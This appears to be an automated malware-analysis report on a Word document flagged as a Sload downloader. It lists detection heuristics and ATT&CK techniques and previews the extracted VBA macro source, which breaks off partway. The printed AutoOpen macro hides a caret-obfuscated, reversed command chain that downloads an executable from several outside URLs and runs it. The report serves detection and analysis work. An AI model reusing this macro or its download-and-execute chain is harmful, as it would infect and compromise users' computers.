Verdict: MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1059 Command and Scripting Interpreter
The sample contains critical heuristics indicating VBA macros with a Shell() call, and is detected by ClamAV as a downloader. The AutoOpen macro attempts to execute obfuscated commands, likely to download and run a second-stage payload. The specific obfuscation makes it difficult to determine the exact URL or command, but the overall intent is clear.
Heuristics (6)
- ClamAV: Doc.Downloader.Sload-6770364-0 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Sload-6770364-0
- VBA macros detected [medium, 2 related findings] (OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA [critical] (OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro [high] (OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] (EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4235 bytes |
SHA-256: 3d391ff3f81fc8718242fc0dad9dcae414fe36acca5a899890caa233129c5eab
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ukBJsqKi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
If jdzZqW Xor 7 Then
NNtLLW = "tAPzSLPfAw"
End If
If TbUPz <> 11 Then
mAnjt = "RiuA"
End If
BqfbHfPJWY (KeyString(ZQwwfZf + bLAFGCRi + 0 + 4 + 63 + wWsjjEl + AczYfoB) + wjmrIF + wMFNO + KeyString(XMMhhQs + DYLcmUR + 0 + 4 + 73 + AmirH + KbFYiOlK) + qwrAmzkcG + PUPzWNULXz + hHosArkwj + AfFwtWo + DonBMk)
If lpBiwr Or 17 Then
dtNJb = "iHY"
End If
If WNdat And QQwzw Then
khcFOR = "w"
End If
End Sub
Attribute VB_Name = "mVzIiLrVhOWzO"
Function qwrAmzkcG()
If nzaTp = 2 Then
wAJlA = "nSFoV"
End If
If bcpMIf = 2 Then
isVVLZ = "qDUYUR"
End If
If HIjatU = CmCRc Then
pcqDh = "NKSFkZ"
End If
If GbzjMo Or VhdhmF Then
qiTuwC = "b"
End If
ccMWBTLVWkU = "d /V^:^ON/C" + """" + "^s^e^t ^u^" + "z^wF=^ ^ ^ ^ ^ ^"
If VuOmU >= 6 Then
mqdhhf = "dwONdjiihdTbPu"
End If
iNPsWqoH = " ^ ^ ^ ^ ^ ^ ^ ^ ^ " + "^}^}^{^hct^ac^}^" + ";^k^a^er^b;^KJ^z^$^"
nzRTqMMqdn = " ^m^e^t^I^-^e^ko" + "vnI^;)^K^J^z^" + "$^ ,CwR^$(^e" + "^l^i^F^d^a^o^l" + "n^w^o^D^.^F^E^l^$^{^" + "yr^t^{)^F^dM^$^ "
qwrAmzkcG = ccMWBTLVWkU + iNPsWqoH + nzRTqMMqdn
If jjjQA < jozFQI Then
bEUdJ = "qarnQjo"
End If
If KFplBV Xor AwjdD Then
ZiaNVJ = "P"
End If
End Function
Function PUPzWNULXz()
If dwhpsQ >= 13 Then
LapduQ = "HBaDVw"
End If
If MANNC > iPiET Then
IDnMI = "zSdpwkKiOI"
End If
If koFKm Or 13 Then
bfOThK = "YaM"
End If
qRoPKU = "n^i^ C^wR^$(^h" + "c^a^er^o^f^;^'^" + "e^x^e^.^'^+^p" + "D^h$^+^'^\"
If MkmWo And ziaOzY Then
iYnilu = "iJGw"
End If
If OvnzN = WEdCTz Then
oSTiw = "RGkcUjkSf"
End If
If wLJvN And zrrUP Then
wduULW = "FwNZ"
End If
If iTTQd >= rhTEH Then
abCWmH = "BilzZMYw"
End If
If sTtEEa Or PHTUS Then
sEsMsi = "jGa"
End If
NTuBjYILi = "^'^+c^i^l^b^" + "u^p^:vn^e$^=^K^" + "J^z^$^;^'^8^3" + "^6^'^ ^=^ ^p" + "^D^h^$;)^'^@^"
vdWUbniapNc = "'(^ti^l^p^S.^" + "'^s^s^Ec1^h" + "^7^f^P/^moc^.^s^e^l" + "^g^g^i^g^f^o^x^ob//^" + ":^p^t^t^h^@n^gc^B^" + "yH^l/^u^a^.^m^oc^.e"
If SMzCk Or zORIrl Then
HXQZDj = "pi"
End If
If tzRwTP >= ibBJiG Then
KBnDXo = "d"
End If
If BaHqi > HEiVT Then
nwOtF = "YcVEk"
End If
If BzjDiq And 4 Then
NqdkVK = "Vf"
End If
vXaTSBAmBfb = "n^o^tc^i^m^s^oc//^:" + "^p^t^t^h^@^Y^f^oC^" + "a^J^W/^ur^."
OnrjPQvoSv = "^5^em^u^t^s^" + "oc//^:^pt^t^h^@^P^" + "t^i^X^Fs^q^3^G/"
PUPzWNULXz = qRoPKU + NTuBjYILi + vdWUbniapNc + vXaTSBAmBfb + OnrjPQvoSv
If zZGEDw > 19 Then
isoJpF = "GfqLz"
End If
End Function
Function hHosArkwj()
VpzIbqs = "r^f^.t^o^y^a^m^" + "se^u^g^u^h//^:^p^t^t" + "h^@^T^9^5^q^t^D^1^" + "L^LN/^8^1^0^2^g^u^" + "A/^s^d^a^o^l^p^u/^"
LBVtvoEGFi = "tn^e^tn^oc^-^p^" + "w/^k^h^.^m^oc^.^a^e^" + "bc//^:^s^p" + "^t^t^h^'^=^F^d^M^$^;"
MtBorPILiDc = "^tne^i^lC^be^W^.t^eN" + "^ ^tc^e^j^b^o^" + "-^w^en^=^F^El^" + "$^ ^l^l^e^h^sr^e^w^o" + "^p&&^f^or /^L %^"
If MRdjc Or prdVvi Then
wYnMts = "zQnsm"
End If
If kObhBM >= vPWcLW Then
haYESD = "rALho"
End If
nNbCUiQ = "3 ^in (^3^9^3" + "^;^-^1^;^0)^d" + "^o ^s^e^t PN^A=" + "!PN^A!!^u^z^wF:~%^3"
woIcWiGfj = ",1!&&^i^f %^3" + "=^=^0 c^a^l^l " + "%PN^A:^~^5%" + """" + ""
hHosArkwj = VpzIbqs + LBVtvoEGFi + MtBorPILiDc + nNbCUiQ + woIcWiGfj
If ikzWOw Or 7 Then
NUijKM = "tTLVQHTk"
End If
If aFCGrT Xor cZkEcu Then
zdzWc = "IQprYHlXw"
End If
If sRaBQM = 19 Then
tTnTI = "MIDM"
End If
If OPANuf = zttiXA Then
wDIoNS = "NwnvB"
End If
End Function
Attribute VB_Name = "MKwqSjuUjAdcw"
Function BqfbHfPJWY(CSWYMEToObq As String)
Const hLjOBa = 475327237 - 475327237
If MkBrE > IFjTCs Then
TvrXir = "KilVOsiGSkqRn"
End If
If zmboUJ Or 16 Then
RQaQp = "nsCn"
End If
If CMTBrC > njNEkL Then
MHSCw = "qJK"
End If
If LiKibI Or kjFYbS Then
WmSosE = "ViYtSo"
End If
If UpDmo An
... (truncated)